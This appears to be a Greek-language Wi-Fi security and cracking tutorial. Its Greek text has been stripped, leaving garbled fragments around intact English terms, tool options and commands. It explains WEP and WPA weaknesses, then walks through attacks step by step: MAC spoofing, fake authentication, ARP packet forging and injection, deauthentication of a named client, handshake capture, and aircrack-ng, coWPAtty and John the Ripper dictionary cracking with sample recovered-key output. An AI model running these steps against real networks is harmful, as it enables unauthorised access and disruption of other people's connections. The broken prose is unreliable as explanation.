Professional Documents
Culture Documents
Hacker , ,
, , Update server client.
patch critical , exploits , advisories
. , data loss.
' Hacker Cracker ,
Root Admin , ban
ADMHN
0_. qubix
1. 802.1
1.1. 802.1
1.2.
2.
2.1.
2.2.
a) symmetric key cryptography
b) hash algorithms
c) asymmetric key cryptography
3.
4. To WEP
4.1. ' WEP
4.2. WEP
4.3. WEP;
a) authentication
b) integrity protection
c) IVs
5. The empire strikes back - To WPA
5.1. WPA / WEP
5.2. 4-way handshake
6. WPA2 total recall
7.
7.1.Deauthentication
7.2.Fake authentication
7.3.Interactive packet replay
7.4.ARP request replay
7.5.KoreK chopchop
7.6.Fragmentation attack
7.7.Caffe-latte attack
8. hardware
8.1.aircrack-ng suite
8.2.kismet
8.3.wireshark
8.4.cowpatty
8.5.john the ripper
8.6.backtrack
8.7. hardware
9. WEP cracking
10.WEP cracking revisited
11. ...
12. WPA cracking
12.1. Recon Kismet
12.2. Passive Attack
12.3. Active Attack
12.4. Four-way Handshake
12.5. Crack
12.6. Crack
13. ...
14.
0_. qubix
3 :
- ,
copy paste *
-To crackers
wifi
*) , !
1. 802.1
802.1;
802.1 802.1 .
(authentication)
(supplicant) o , authenticator
( access point - AP) authentication server ( RADIUS server) .
To 802.1, wireless ,
supplicant authentication server. authenticator
, wireless access points
/ . servers, APs ,
. Access Point authentication server.
802.1 , EAP
(Extensible Authentication Protocol)
, PPP(Point-to-Point Protocol - DSL
authentication PPPoE -PPPover Ethernet-) LAN PoL (EAP
over LAN) EAP-TLS, PEAP, Kerberos V5
802.1 .
, 802.11 legacy 1997
.
2.4Ghz ( 900hz
GSM) data rate 1 2 Mbit/s .
2.4Ghz , 1999 802.11a
5Ghz, data rate
54bit/s. 5Ghz
2.4Ghz, ,
802.11a .
T 802.11b, data
rate 11bit/s. H data rate
(modulation - DSSS).
, wireless ,
(2.4Ghz) bluetooth, ,
2003, 802.11g 2.4Ghz
802.11a. 54bit/s data rate
hardware 802.11b 802.11a
21%. data rate, hardware
3 (dual-band -2.4 & 5Ghz, tri-mode -802.11a &
802.11b/g).
[]
2.4Ghz, .11b
2004 802.11i wireless ,
WEP, , WPA.
(c-f, h, j) .
802.11n, MIMO
(Multiple In-Multiple Out), , 2,3 4
, data streams
. 600bit/s bitrate
2.4 5Ghz 802.11a/g (OFD - Orthogonal
frequency-division multiplexing).
2.
(plaintext cleartext)
(cipher)
(key) ,
.
(ciphertext).
2 , (symmetric-key cryptography)
(public-key cryptography).
Symmetric-key cryptography
.
, ,
cipher plaintext. stream cipher RC4,
SSL, RDP, SASL, Kerberos, TLS WEP WPA.
hash, plaintext
plaintext .
hash MD5 SHA.
public-key cryptography ( asymmetric-key)
symmetric-key ,
, key ciphertext
.
.
public-key keys, private
ciphertext public plaintext.
,
. asymmetric key DSA, RSA, ElGamal o
PGP OpenPGP.
3.
,
...
AP (Access Point), Wi-Fi
Ad Hoc (Mode)
, AP
ARP (Address Resolution Protocol), IP MAC.
Association
( authentication)
[]
Authentication (supplicant),
.
Authenticator
( AP).
Beacon AP
ESSID, MAC address
BSSID (Basic Service Set Identifier), MAC access point.
CCMP (Counter-Mode / Cipher Block Chaining Message Authentication Code Protocol),
WPA2, AES block cipher.
Channel , 1hz 5Mhz
Wi-Fi .
CRC (Cyclic Redundancy Check), pseudo-integrity
.
Dictionary ( xP) bruteforce attack
Dynamic WEP WEP : broadcast key
( shared key ) session key authenticated
supplicant. .
EAP (Extensible Authentication Protocol),
authentication.
EAPOL (EAP Over LAN), EAP .
ESSID (Extended Service Set Identifier),
Fragmentation
.
Frame frame packet. O
layer 2 OSI model frames,
3 layer packets ( OSI model )
GEK (Group Encryption Key), multicast traffic (
-integrity- CCMP).
GIK (Group Integrity Key), multicast traffic (TKIP).
GMK (Group Master Key), group key hierarchy.
GTK (Group Transient Key), GMK.
Handshake - supplicant
ICV (Integrity Check Value), data field plaintext
( CRC32 ).
Infrastructure (Mode) AP
.
IP address (Internet Protocol address)
.
IV (Initialization Vector), encryption key
keystream.
KCK (Key Confirmation Key), handshake.
KEK (Key Encryption Key), handshake .
MAC address (Media Access Control address), 48-bit
.
MIC (Message Integrity Code), data field plaintext
( Michael).
MK (Master Key), supplicant authenticator
authentication 802.1x.
Monitor Mode wifi
wifi . raw mode.
MPDU (Mac Protocol Data Unit), fragmentation.
MSDU (Mac Service Data Unit), fragmentation.
PAE (Port Access Entity), 802.1x.
packet () ()
. ,
"" .
[]
4. WEP
' WEP
To WEP wireless 1999.
RC4 CRC32 integrity checking.
, ,
40-bit ,
104-bit . WEP
WPA/WPA2,
. , routers .
WEP
-
WEP . 24-bit V (K)
RC4 plaintext (P) checksum
(ICV), ciphertext (C):
[]
, :
802.11 header
BSS ID
Initializationvector(IV)
Destinationaddress
(unencrypted)
LogicalLinkControl
SubnetworkAccess ProtocolHeader
Data
IntegrityCheckValue
Authentication
association, .
2
capture four-way handshake WEP key , .
WEP;
Authentication ()
, supplicant AP,
.
key.
attacker
.
client P,
attacker, client, mac address .
key (
key AP),
client ( )
key. AP.
H .
WEP, : C=PR XOR, C
ciphertext, P plaintext ICV (P||ICV(P)) R
key IV RC4 (RC4(key||IV)). C
P, R C, P. O
IVs WEP IV client,
attacker, o R .
Integrity protection
To 2001 Borisov, Goldberg Wagner CRC CRC
bit-flipping attack. O CRC CV plaintext,
.
ICV plaintext ,
. CRC
, XOR.
: CRC(X Y) = CRC(X) CRC(Y).
(flip) bits plaintext
ICV (forged packet), P
router.
WEP
. WEP
, ! WEP ...
. , , bit-flipping,
.
[]
IVs
stream cipher plaintext
(keystream) . WEP IVs.
IV (24bits) IVs 17.
IV
. AP 11Mbps 1500 ,
IVs 5 :
, chopchop
WPA protected , , key
bruteforce dictionary based attacks 4-way handshake.
4-way handshake
WPA. To 802.11i RSN
4-way handshake supplicant authenticator, RSNA.
4 RSN(A) :
802.1X
RSN(A) &
4-way handshake ( 3 bullet 2
authentication server) :
PMK (*)
PTK
cipher
GTK
*) WPA-PSK mode, PMK = PSK.
H PTK :
PTK = PRF-X (PMK, Paiwise key expansion, Min(AP_Mac, STA_Mac) || Max (AP_Mac, STA_Mac)
|| Min (ANonce, SNonce) || Max (ANonce, Snonce))
.. :
PRF-X: Pseudo Random Function
Anonce: AP
SNonce: o
STA_mac,AP_mac: mac addresses AP
PTK KCK (Key Confirmation Key), KEK
(Key Encryption Key) TK (Temporary Key). KCK MIC.
H PTK, , .
RSN ,
, WEP.
, 4-way handshake.
7.
Deauthentication
deuthentication clients
(reauthenticate).
clients DoS (Queensland DoS).
:
Fake authentication
clients associated
MAC adress. WEP association
AP. ARP AP WPA/WPA2.
KoreK chopchop
, WEP
key, WEP key, plaintext PRGA
.
:
1)
2) byte (chop off)
3) 0,
4) AP
5) byte 1
256 , []
AP
6) byte
oreK bit-flipping CRC32
ICV choped off ICV
.
Fragmentation attack
1500 bytes PRGA,
injection attacks. ,
PRGA ,
RPGA .
fragmentation attack ( AP,
relay) .
, 8 bytes
802.11 LLC/SNAP header. 3 bytes
: AA, AA, 03 frame (
frame ). 3 bytes 00,00,00 IP
2 bytes. 2 bytes , IP ARP.
byte 08, IP ARP
, ARP 36 54 bits.
:
byte.
0xAA
0xAA
0x03
0x00
0x00
0x00
--------ORG code-------
0x08
--Ether
??
type--
[]
ARP
. ARP
. ..1500bytes
P . ,
ARP .
bytes .
. IV ,
bit-flipping
WEP ...
Caffe-latte attack
attacker P
. caffe-latte , laptop
, cached WEP keys
attacker !
SSID spoofing evil twin/honeypot attacks
AP
clients wi-fi hotspots . attacker
AP ESSID connex
laptop WEP key man-in-the-middle
. attacker WEP key
. , ;
ARP pc
ip address. client ,
ip address .
ip . attacker
ARP requests . ARP
bit-flipping integrity checking WEP, P
MAC address header gratuitous ARP ,
ARP request .
o attacker , ARP
request, ip - -
. attacker WEP key.
8. hardware
X software
Aircrack-ng suite
wifi crackers, ,
mass deauthentication. :
aireplay-ng
, wifi
package injection.
:
aireplay-ng <> <replay interface>
Filter options:
[]
-m
-n
-u
-v
-t
-f
-w
len :
len :
type : frame control, type field
subt : frame control, subtype field
tods : frame control, To DS bit
fromds : frame control, From DS bit
iswep : frame control, WEP bit
package injection
-x
-p
-a
-c
-h
-e
-j
-g
-k
-l
-o
-q
-y
:
aireplay -1 0 e [ Essid ] -a [ Bssid AP] b [ bssid AP] h [ bssid station ] [ interface ]
-1 = fakeauth
0 = delay AP
-e = AP authentication
-a = mac AP injection
-b = mac P
-h = mac
interface = wlan interface , ath0
airmon-ng
airmon monitor mode
:
airmon-ng <start|stop> <interface> [channel]
:
[]
airodump-ng
airodump raw . ,
AP GPS,
:
airodump-ng <options> <interface>[,<interface>,...]
:
--ivs
: IVs
--gpsd
--write
-w
--beacons
--update
--showack
-h
-f
--berlin
:
<prefix> :
:
:
<secs> :
:
:
<msecs> :
<secs> :
GPSd
prefix
--write
beacons dump file
secs
ack/cts/rts
stations --showack
channel ms
AP/client
(Default: 120 seconds).
<file> : file
-r
Filter options:
--encrypt
<suite>
--netmask <netmask>
--bssid
<bssid>
-a
:
:
:
:
APs cipher
APs mask
APs BSSID
unassociated clients
aircrack-ng
aircrack cracking WEP WPA/WPA2-PSK eys.
WEP , PTW (Pyshkin, Tews, Weinmann) FMS/KoreK.
PTW
Andreas Klein (2005) o
RC4 keystreams Key FMS. ARP
.
FMS/KoreK WEP key:
WPA/WPA2 .
WPA/WPA2 shared key 4-way handshake client
AP dictionary attack handshake .
:
aircrack-ng [options] <capture file(s)>
[]
Options:
option
-a
amode
-e
essid
If set, all IVs from networks with the same ESSID will be used. This option is also required
for WPA/WPA2-PSK cracking if the ESSID is not broadcasted (hidden).
-b
bssid
Select the target network based on the access point's MAC address.
-p
nbcpu
-q
none
Enable quiet mode (no status output until the key is found, or not).
-c
none
(WEP) Restrict the search space to alpha-numeric characters only (020 - 0x7F).
-t
none
(WEP) Restrict the search space to binary coded decimal hex characters.
-h
none
(WEP) Restrict the search space to numeric characters (030-039) These keys are used by
default in most Fritz!BOXes.
-d
start
(WEP) Set the beginning of the WEP key (in hex), for debugging purposes.
-m
maddr
(WEP) MAC address to filter WEP data packets. Alternatively, specify -m ff:ff:ff:ff:ff:ff to
use all and every IVs, regardless of the network.
-n
nbits
(WEP) Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The
default value is 128.
-i
index
(WEP) Only keep the IVs that have this key index (1 to 4). The default behaviour is to
ignore the key index.
-f
fudge
(WEP) By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP.
Specify a higher value to increase the bruteforce level: cracking will take more time, but
with a higher likelyhood of success.
-k
korek
(WEP) There are 17 korek statistical attacks. Sometimes one attack creates a huge false
positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, -k
17 to disable each attack selectively.
-x/-x0
none
-x1
none
-x2
none
-X
none
-y
none
(WEP) This is an experimental single bruteforce attack which should only be used when the
standard attack mode fails with more than one million IVs
-w
words
-z
none
aircrack:
KB = Keybyte
depth =
byte = byte key IVs
vote = byte
:
aircrack-ng -w h:hex.txt,ascii.txt -a 1 -n 64 -e apname wep10-01.cap
(wep dictionary attack)
[]
-w h:hex.txt,ascii.txt = dictionaries ( h:
hex values)
-a 1 = WEP
-n 64 = 64bit
-e apname = AP (-b mac address )
wep10-01.cap =
packetforge-ng
O packetforge
injection. ARP requests,
UDP, ICMP custom . ARP request injection.
Forge options:
-p <fctrl> : set frame control word (hex)
-a <bssid> : set Access Point MAC address
-c <dmac> : set Destination MAC address
-h <smac> : set Source MAC address
-j : set FromDS bit
-o : clear ToDS bit
-e : disables WEP encryption
-k <ip[:port]> : set Destination IP [Port]
-l <ip[:port]> : set Source IP [Port] (Dash lowercase letter L)
-t ttl : set Time To Live
-w <file> : write packet to this pcap file
Modes (long modes use double dashes):
arp : forge an ARP packet (-0)
udp : forge an UDP packet (-1)
icmp : forge an ICMP packet (-2)
null : build a null packet (-3)
custom : build a custom packet (-9)
Kismet
Kismet (sniffing), intrusion
detection 802.11 wireless .
:
Wireshark/Tcpdump
Airsnort weak-iv packets
IP
channel hopping multicard split channel hopping
SSID
Client/Server client kismet server
/ APs clients
AP default
WEP packets realtime
Named pipe Snort
, Kismet instance
instances (remote drones)
XML output
20
, Kismet , , ,
APs clients .
, (channel hopping)
. ,
GPS.
[]
Wardriving: Mobile detection of wireless networks, logging and mapping of network location, WEP,
etc.
Site survey: Monitoring and graphing signal strength and location.
Distributed IDS: Multiple Remote Drone sniffers distributed throughout an installation monitored by a
single server, possibly combined with a layer3 IDS like Snort.
Rogue AP Detection: Stationary or mobile sniffers to enforce site policy against rogue access points.
Kismet :
Interface:
- Name : SSID
- T : T
- W :
- Ch : AP
- Packts :
- Flags : IP (. A4 ARP )
- IP Range : IP
- Size : AP
:
W Y (Yes) WEP,
O (Other) (WPA/TKIP/LEAP/EAP/TLS). O ,
(Information) Encrypt
.
:
Kismet , .
:
- :
- : , factory default
- :
- :
:
- A Access Point
- H (Ad-Hoc) - ad-hoc point-to-point wireless
- P (Probe request) client ,
- D (Data) - Data network
- T (Turbocell) - Turbocell network
- G (Group) - Group ( )
:
e popup kismet servers
z - Zoom
m ( config)
t
g
u group
[]
c popup clients
n group
i
s
l - signal/power/noise
r
a
p
f
w alerts warnings.
Wireshark
To wireshark ( ethereal)
, . ,
Pcap / . monitor mode (
promiscuous mode ethernet)
:
Windows, Linux, OS X, Solaris, FreeBSD, NetBSD
Live ( format)
Gui cli (TTY-mode TShark)
VoIP
capture formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure
IDS iplog, Microsoft Network Monitor, Network General Sniffer, Sniffer Pro, and NetXray, Network
Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer,
Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets
EtherPeek/TokenPeek/AiroPeek, .
/ Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth,
USB, Token Ring, Frame Relay, FDDI
IPsec, ISAKMP, Kerberos, SNMPv3,
SSL/TLS, WEP WPA/WPA2
Output XML, PostScript, CSV
coWPAtty
To coWPAtty bruteforce dictionary attack,
WPA/WPA2 handshakes.
Usage: cowpatty [options]
-f
-r
-s
-h
-v
-V
Dictionary file
Packet capture file
Network SSID
Print this help information and exit
Print verbose information (more -v for more verbosity)
Print program version and exit
[]
: http://www.openwall.com/john/
Backrack
To Backrack live Linux, Slackware
penetration testing ( 300).
patched drivers , -
.
:
http://www.remote-exploit.org/backtrack.html
documentation:
http://wiki.remote-exploit.org
hardware
aircrack-ng . , wireless
chips :
chipset
driver
atheros
madwifi
Broadcom
bcm43xx
b43
b43
Centrino a/b/g
ipw2915/3945
4965AGN
Prism2/3
HostAP/wlan-ng
PrismGT FullMAC
prism54
Ralink
RTL8185
mac80211
RTL8187B/RTL8197
RTL8187
RTL8187L
Rtl8187,rtl8187b
TI (ACX100/ACX111)
ACX100/ACX111
[]
drivers patching.
atheros chip SMC-EZconnect & Ezconnect2, Level One wc-0300, Netgear WAG511, D-Link DWL-G550,
Thinkpad 11a/b/g
:
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
9.WEP cracking
Injection attack
,
, WEP key
. chip atheros.
1) monitor mode [1]
modprobe ath_pci
modprobe ipwraw
2) mac address ( interface)
iwconfig
airmon-ng stop ath0
ifconfig wifi0 down
macchanger mac 00:11:22:33:44:66 wifi0
3) interface monitor mode
airodump-ng ath0
P :
ESSID: connex
mac: 00:21:21:21:21:21
channel: 6
5)
[]
-h = mac
-e = essid P
ath0 = interface
7) AP
1) APs
airodump-ng ath0
AP channel = 7
[]
2) monitor mode 7
airmon-ng stop ath0
airmon-ng start wifi0 7
3) association AP
aireplay-ng -1 0 -e [ AP] -a [mac P] -h [mac ] ath0
-1 = Fake authentication AP
-e = essid ( AP)
-a = Mac address AP (bssid)
-h = mac address (source)
* Atheros chipsets MAC address
4) keystream aireplay-ng
aireplay-ng -5 -b [mac AP] -h [mac ] ath0
-5 = fragment: keystream
-b = AP mac address (bssid)
-h = mac address (source)
ath0 = wireless interface extension
5) ARP request packetforge-ng
packetforge-ng -0 -a [mac AP] -h [mac ] -k 255.255.255.255 -l
255.255.255.255.255 -y fragment-0206-131211.xor -w arp-request
-0 = ARP
-a = bssid
-h = mac
-k = set Destination IP
-l = set Source IP
-y = PRGA ( (4) )
-w = pcap
6) airodump-ng
airodump-ng -c 7 --bssid [mac AP] -w wep ath0
-c = AP
-bssid = mac AP
-w = date
ath0 = wireless interface extension
7) inject
aireplay-ng -2 -r arp-request ath0
[]
8) WEP key
aircrack-ng -P 2 -b 00:18:F6:AC:11:13 wep*.cap
11. ...
traffic
, IVs .
injection AP
.
IVs,
keys
: -k N ( =1..17) -y. (. Aircrack )
fudge factor (-f) . default 2 ,
,
.
,
AP :P
12.WPA cracking
, , kismet
reconing, wireshark packet filtering, coWPAtty JtR dictionary attacks.
:
http://www.smallnetbuilder.com/content/view/30278/98/1/1/
...
!
Recon Kismet
Kismet (Backtrack > Radio Network Analysis > 80211 > Analyzer). H version 3
wizzard wireless interface ( ). []
,
/usr/local/etc/kismet.conf interface:
:
/usr/local/etc/kismet.conf -- Line 25:source=madwifing_g,wifi0,kis0
Kismet :
bt ~ # kismet
kismet , .
raw packets,
PSK, client AP.
interface.
.
kismet, h help menu
.
, ,
, default . W : None
("W"), WEP ("Y"), WPA ("O" Other). H Ch AP.
Pacts Kismet AP.
.
clients AP,
handshake .
kismet autofit mode,
. highlight
enter. .
encryption scheme, BSSID clients AP.
c kismet clients.
clients Established ("E") To DS ("T") ( T ).
Passive Attack
, kismet,
, , kismet
. airodump-ng, kismet
, .
four-way handshake, airodump-ng ,
.
passive WPA-PSK attack :
Kismet
(: channel, "s" "c")
(highlight AP "L")
handshake
Active Attack
Kismet,
associated clients AP .
, deauthentication packets,
[]
. four-way
handshake.
. association
( )
AP ,
monitor mode.
- VAP (Virtual Access Point):
airmon-ng stop ath0 ( atheros)
- , monitor mode
airmon-ng start wifi0
:
airodump-ng -w cap --channel 6 ath0
:
aireplay-ng --deauth 1 -a 00:18:E7:02:4C:E6 -c 00:13:CE:21:54:14 ath0
, client AP ()
(reauthentication). Kismet
deauthentication floods,
, , .
, airodump-ng
reauthentication event.
Four-way Handshake
authentication handshake,
Wireshark,
WPA handshake.
Wireshark (Backtrack > Privilege Escalation > Sniffers)
Kismet (Kismet-<date>.dump). H WPA four-way handshake Extensible Authentication
Protocol over LAN (EAPoL). Wireshark EAPoL , []
eapol [filter].
, client-AP-client-AP. handshake,
.
Crack
Wi-Fi Alliance WPA-PSK.
() bruteforce attacks,
...6 ( 948
6 1015). pc 35 hashes ,
...5 hash table 8 .
.
. hash (salted) SSID AP, hash
table 5 , APs
SSID. WPA key brutforce ...
, passphrases
, hashes
. dictionary attack.
To BackTrack 2 , , ,
, ( passwords ).
Backtrack ,
.
, dictionary attack
WPA handshake aircrack-ng, coWPAtty. aircrackng .
coWPAtty hashes .
aircrack-ng attack
aircrack-ng -e AP_SID -w dictionary_file capture_file
(BackTrack v3):
aircrack-ng -e snb -w /pentest/wireless/cowpatty-4.0/dict Kismet-Jan-15-2008-1.dump
Aircrack-ng 0.8
[00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key
: CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06
CE
FF
2B
EAPOL HMAC
F8
8A
1D
20
BB
9D
41
90
F3
A0
E1
8C
B1
FC
65
EA
55
ED
17
32
AE
A6
93
15
EE
DE
0E
A6
1F
70
64
26
66
84
32
62
AE
BA
BF
93
51
90
25
27
1F
83
50
66
F8
7E
D5
66
12
CD
4A
E0
98
40
5E
71
: 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
[]
aircrack-ng hashes ,
coWPAtty
coWPAtty , :
/pentest/wireless/cowpatty-4.0. Then run:
:
./cowpatty -s AP_SID -f dictionary_file -r capture_file
:
./cowpatty -s snb -f dict -r Kismet-Jan-15-2008-1.dump
:
./genpmk -s snb -f dict -d dict_hash
:
./cowpatty -s snb -d dict_hash -r Kismet-Jan-15-2008-1.dump
[]
Crack
dictionary
. Passphrases dinosaur my wpa key coWPAtty
aircrack. dinosaur52 my Wp@ k3y;
dictionary bruteforce
, !
, ..
(*) (rules) cracking *NIX John the Ripper(JtR). ,
dictionary
input coWPAtty aircrack-ng on the fly. (*)
mangling (!!!)
aircrack-ng:
./john --wordlist=password_list --rules --stdout
| aircrack-ng -e ssid -w - capture_file
:
./john --wordlist=password.lst --rules --stdout
| aircrack-ng -e snb -w Kismet-Jan-15-2008-1.dump
John set ,
documented "regex-esque" .
, default rules dictionary.
john.conf
section [List.Rules:Wordlist] ( 262) :
$[0-9]$[0-9]
$[0-9]$[0-9]$[0-9]
999
dictionary ( dinosaur52 )
. 3 1
:
[]
sE3
sl1
sE3sl1
glid335 :
sE3$[0-9]
sE3$[0-9]$[0-9]
sE3$[0-9]$[0-9]$[0-9]
sl1$[0-9]
sl1$[0-9]$[0-9]
sl1$[0-9]$[0-9]$[0-9]
sE3sl1$[0-9]
sE3sl1$[0-9]$[0-9]
sE3sl1$[0-9]$[0-9]$[0-9]
, dictionary
passphrases.
passphrase ;
! JtR
passphrases
dictionaries.
John,
.
wordlist coWPAtty 10.201 . John
489.989.
45.720.022! ,
.
out
there. ,
, 45 passphrases
, 6 ...
45
, ,
WPA passphrase , ..
13. ...
Four-way Handshake!
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
No valid WPA handshakes found.
[]
four-way handshake. , ,
.
, airodump-ng BSSID
IV's.
AP. BSSID
, acknowledgements (ACKs), .
BSSID , airodump.
14.
monitor mode chipsets atheros:
interface:
airmon-ng stop [interface]
ifconfig [interface] down
Intel PRO/Wireless 3945ABG
modprobe -r iwl3945
modprobe ipwraw
modprobe iwl3945
[]
Madwifi-ng Commands:
madwifi access points (VAPS), wireless
wireless . (wireless card = wifi0)
wlanconfig athx destroy
( athx VAP)
wlanconfig athx create wlandev wifi0 wlanmode [sta|adhoc|ap|monitor]
athx VAP
ifconfig Commands:
ifconfig [interface] up
( interface)
ifconfig [interface] down
( interface)
ifconfig [interface] [IP address] netmask [subnet-mask]
( IP subnet-mask)
ifconfig [interface] hw ether [MAC]
( mac address wireless )
[]
iwconfig Commands:
iwconfig [interface] mode [master|managed|adhoc|monitor]
iwconfig [interface] essid [any|essid]
iwconfig [interface] key [hex|s:ascii|off|open]
iwconfig [interface] channel [#|auto]
iwconfig [interface] freq 2.422G
iwconfig [interface] ap [mac address]
iwconfig [interface] rate [auto|#M]
iwpriv Commands:
iwpriv [interface] monitor [A] [B]
[A]
0 = disable monitor mode
1 = enable monitor mode with Prism2 header
2 = enable monitor mode with no Prism2
[B] Channel to monitor (1-14)
http://anonsvn.wireshark.org/wireshark/trunk/manuf
e-books
Sohail/Vivek: Caffe-Latte attack
hakin9: WiFi Security
Bittau/Handley/Lackey: The final nail in wep's coffin
ittau:Fragmentation Attack in Practice
Foundstone (antoniewitz): 802.11 Attacks
Levente Buttyn/Lszl Dra: WiFi Security WEP and 802.11i
Richard Yang:Security and Cooperation in Wireless and Mobile Networks
Pyshkin/Tews/Weinmann:Breaking 104 bit WEP in less than 60 seconds
Changhua/Mitchell: Analysis of the 802.11i 4-Way Handshake
PGP corp: Introduction to cryptography
Logicallysecure:Wireless linux commands
websites
Wikipedia
Aicrack-ng wiki
wi-fiplanet.com
infoworld.com
airtightnetworks.com
remote-exploit.org
madwifi.org
[]
lifehack.ws
kismetwireless.net
: CC 3.0 attribution-sharealike
[]